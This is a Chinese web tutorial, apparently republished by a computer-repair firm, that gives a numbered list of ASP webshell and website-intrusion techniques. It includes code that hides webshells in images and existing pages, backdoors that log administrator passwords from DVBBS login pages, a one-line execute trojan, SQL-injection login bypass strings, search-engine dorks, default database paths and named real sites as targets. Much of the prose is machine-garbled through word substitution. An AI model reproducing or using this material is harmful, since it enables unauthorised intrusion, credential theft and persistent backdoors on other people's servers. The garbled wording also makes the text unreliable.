设为主页 | 加入收藏 | 繁體中文

如何变成ASP木马高手

  1.名称:怎样制作图片ASP木马 (可表现图片)
  建一个asp文件,内容为
  找一个正常图片ating.jpg,插入一句话木马(好比冰狐的),用ultraedit举行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要更换自己asp的),再把jpg文件扫尾加入
 
  2. 名称:整蛊网吧
  先用精锐网吧帮助工具得到用户名和暗码,然后用盘算机办理联结一台呆板,开telnet,连接,开共享,
  复制一个木马过去运行即可。
  3.名称:感受MD5暴力破解的魅力
  rainbowcrack用法先用rtgen天生库 "rtgen md5 byte 1 7 5 2400 40000 all"
  1和7代表暗码最小和最大长度
  阿汀我再加个要领:http://md5.rednoize.com/ 在线破解
  大概到http://www.md5lookup.com/?category=01-3&searck=on
  4.很多工夫我们做免杀木马,不消懂汇编,用斗极加壳程序就能逃杀,另有很多加壳软件,各人木马加壳的工夫最好多选择不知名的加壳软件
  5.名称:潜伏的插入型ASP木马
  (1)在我们要做手脚的asp文件里加入如下内容
  <%if request("action")="ok" then%>
  shell代码插在这里,最好是小马,还要加密一下
  <%end if%>
  访问的工夫在你作手脚的asp文件背面加上?action=ok,即可
  (2)另一种要领,在我们要做手脚的asp文件里加入如下内容
  <%
  on error resume next
  strFileName = Request.QueryString("filer")
  set objStream = Server.createObject("ABODB.Stream")
  objStream.Type = 1
  objStream.Open
  objStream.LoadFromFile strFileName
  objStream.SaveToFile Server.mappath("ating.asp"),2
  %>
  访问的工夫在做手脚的asp文件背面加上?filer=XXX
  XXX为你本地上传的一个途径如 c:ating123.asp
  上传后在做手脚的asp的同文件夹中有ating,asp
  (3)条件得到system权限,
  进中计站目次下一层
  mkdir s…
  copy ating.asp s…/
  如许杀毒软件找不到的
  访问http://网站/s…/ating.asp即可
  6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑天生一个超级用户
  用户名为:hack 暗码110,在DOS下和盘算机办理器上看不到你建立的用户,并且是删除不掉的.
  7.名称:QQ群剧本攻击
  翻开qq对话诓,复制音讯,然后
  下面的内容保存为.vbs 文件,运行即可
  Set WshShell= WScript.createobject("WScript.Shell")
  WshShell.AppActivate "QQ信息攻击剧本"
  for i=1 to 20
  WScript.Sleep 1000
  WshShell.SendKeys"^v"
  WshShell.SendKeys i
  WshShell.SendKeys "%s"
  Next
  8.搜索:程序制作:万鹏 有收费请求空间的,间接上传asp马即可
  9. 名称:片面找出你站上的ASP木马
  (1) 用杀毒软件
  (2) 用FTP客户端软件,点"工具"->"比较文件夹"
  (3) 用asplist2.0.asp上传到站点空间检察,一般功能多的ASP我预计便是ASP木马
  (4) 用工具Beyond Compare
  10名称:拓展思绪拿DVBBS帐号 "一小我私家的圣经"的动画
  (1)曩昔获得webshell后想进入DVBBS的后台,想要办理员的暗码,可以如许
  老措施:
  修正admin_login.asp得到明文DVBBS后台暗码
  在"username=trim(replace(request("username")这行背面
  Dim fsoObject
  Dim tsObject
  Set fsoObject = Server.createObject("Scripting.FileSystemObject")
  set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
  tsObject.Write CStr(request("password"))
  Set fsoObject = Nothing
  Set tsObject = Nothing
  只需办理员登陆后台,在目次下就天生了laner.txt
  (2)login.asp中Case "login_chk"下:
  on error resume next
  Dim rain
  set rain=server.createobject("adodb.stream")
  rain.Type=2
  rain.CharSet="gb2312"
  rain.Position=rain.Size
  rain.Open
  rain.LoadFromFile server.MapPath("laner.asp")
  rain.writetext now&request("username")&"text:"&request("password")&chr(10)
  rain.SaveToFile server.MapPath("laner.asp"),2
  rain.Close
  set rain=nothing
  如许laner.asp将获得全部登陆人的登陆工夫,用户名和暗码
  (3)要是你有自己的网站大概另外的webshell(猛烈发起使用):
  可以建立目次laner,在里面建立一个空的laner.asp和如下代码的rain.asp:
  <%if request("n")<>"" and request("p")<>"" then
  on error resume next
  Dim rain
  set rain=server.createobject("adodb.stream")
  rain.Type=2
  rain.CharSet="gb2312"
  rain.Position=rain.Size
  rain.Open
  rain.LoadFromFile server.MapPath("laner.asp")
  rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
  rain.SaveToFile server.MapPath("laner.asp"),2
  rain.Close
  set rain=nothing
  end if%>
  11. 名称:利用QQ在线状态抓鸽子肉鸡
  天生qq在线状态,把里面的地址改成木马地址,发到论坛在login.asp那边插入一句:
  response.write""response.write""
  效果所有登陆人都会乖乖的把名字和暗码送到你的laner.asp 里
  12. 动画名称:媒体中国整站程序存在多处毛病
  毛病程序:媒体中国整站程序(第一版)
  官方网站:http://meiti.elgod.com/
  毛病: %5c(暴库) 上传 注入
  上传页面:down1/upload.asp
  13. 名称:收费德律风+MSH命令行工具
  http://www.globe7.com/ 翻开主页,点击坐下角,Free DownLoad,下载到本地,安装,
  运行后,会提示正在探求你所在地区的区号。由于是国际远程,注册一个帐号,送100美分,海内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。
  要注意的便是,固定德律风,小灵通 形式为0086521123456 521本来时0521,要省略后面的零,手机号也是一样。
  14. 名称:Bo-Blog的新毛病
  http://网址/index.php?job=../admin/ban
  把此中"克制搜索的词"那部分

另存出来,里面的地址改完整,插入一句话木马
  15. 名称:钩魂者入侵传奇私服
  用百度 搜索 传奇 inurl:tuku
  大概 传奇 inurl:wplm.htm
  再大概 传奇 inurl:coolsites.asp
  友谊链接里插入一句话木马即可
  16. 程序: 宏达企业整站上传毛病
  官方主页:http://www.mu126.com/
  毛病页面:/cx/upfile.asp (上传毛病)
  17.无间盗邮箱,在修正暗码里,用户名和暗码里添or=or
  18.名称: bbsxp5.16后台得到webshell
  bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,便是在基本设置上添加上上传范例也不可,并克制了修正数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。
  19.名称:JHACKJ 2005年最新精典教程
  下载看看吧,不错,各大网站都有
  20.名称:省力入侵韩国肉鸡
  在啊D的扫描注入点项,翻开这个:http://www.google.co.kr/advanced_search?hl=zh-CN
  这是高级搜索项,要害字任意写。这里我写asp?name= 设置为每页表现100条。
  语种选择韩文。搜索,很多sa.
  21.名称:任何网吧的办理系统破解
  选智能ABC,然后vv输出,光标退却两步,按delete键 刚输出的两个vv删除, 末了按Inter键
  22.名称:破解QQ空间插中计页木马的代码
  现在腾讯 已经封了很多QQ空间代码了 就如 曩昔 插中计页木马的代码也早被封了
  突破禁用的要领 代码如下:
 

  末了附上总结的
  1.上传毛病[未几讲]
  pS: 要是看到:选择你要上传的文件 [重新上传]大概呈现"请登陆后使用",80%就有毛病了!
  有时上传纷歧定会成功,这是因为Cookies纷歧样.我们就要用WSockExpert获得Cookies.再用DOMAIN上传.
  2.注入毛病[未几讲]
  pS:对MD5暗码.有时我们不是哪么容易跑出来.要是是[SQL数据库].那么我们可以用以下命令:
  http://注中计址;update admin set password=\新MD5暗码\ where password=\旧MD5暗码\-- [admin为表名.]
  3.旁注,也便是跨站.
  我们入侵某站时大概这个站坚固的自作掩饰,我们可以找下和这个站同一办事器的站点,然后在利用这个站点用提权,嗅探等要领来入侵我们 要入侵的站点。,在这里有个难点,便是一些办事器的绝对途径颠末加密,这就看我们的本事了
  4.暴库:把二级目次中间的/换成%5c
  EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范畴&BigClassType=1
  要是你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的途径。 确定途径名称拼写是否精确,以及是否 连接到文件存放的办事器。
  如许的便是数据库了。下载时用FLASHGET换成.MDB格式的就行.
  5.\or\=\or\这是一个可以连接SQL的语名句.可以间接进入后台。我网络了一下。类似的另有:
  \or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a
  6.社会工程学。这个我们都知道吧。便是猜解。
  EY:http://www.neu.edu.cn/waishi/admin
  admin waishi
  7.写入ASP格式数据库。便是一句话木马[<%execute request("value")%> ],常用在留言本.
  EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个便是ASP格式的数据库],再写入一句话木马
  8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
  EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
  这个站用的是:杰出校友录,源码我下过了,
  默认数据库/webshell途径:databaseliangu_data.mdb 后台办理:adm_login.asp 暗码及用户名都是admin
  9.默认数据库/webshell途径利用:如许的网站很多/利人别人的WEBSHELL.
  /Databackup/dvbbs7.MDB
  /bbs/Databackup/dvbbs7.MDB
  /bbs/Data/dvbbs7.MDB
  /data/dvbbs7.mdb
  /bbs/diy.asp
  /diy.asp
  /bbs/cmd.asp
  /bbs/cmd.exe
  /bbs/s-u.exe
  /bbs/servu.exe
  工具:网站猎手 发掘鸡
  EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
  10.检察目次法:人一些网站可以断开目次,可以方问目次。
  EY:http://www.ujs168.com/shop/admin/
  http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
  如许我们可以找到数据库,下载不消我教吧
  11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种要领可以获得少量的WEBSHELL]
  12.搜索引擎利用:
  (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
  (2).找网站的办理后台地址:
  site:xxxx.comintext:办理
  site:xxxx.comintitle:办理 <要害字很多,自已找>
  site:xxxx.cominurl:login
  (3).查找access的数据库,mssql、mysql的连接文件
  allinurl:bbsdata
  filetype:mdbinurl:database
  filetype:incconn
  inurl:datafiletype:mdb
  我主不做了。。自已做做吧。。
  13.COOKIE诱骗:
  把自己的ID修正成办理员的,MD5暗码也修正成他的,用桂林老兵工具可以修正COOKIE。这个我就未几讲了
  14.利用罕见的毛病:如动网BBS
  EY:http://js1011.com/bbs/index.asp
  可以先用:dvbbs权限提拔工具,使自已成为前台办理员。
  THEN,运用:动网固顶贴工具,找个固顶贴,再获得COOKIES,这个要你自已做。我们可以用WSockExpert获得Cookies/NC包
  这个我就不做了,网上教程多的是,自已下个看看。
  工具:dvbbs权限提拔工具 动网固顶贴工具
  15.另有一些老毛病。如IIS3,4的检察源码,5的delete
  CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: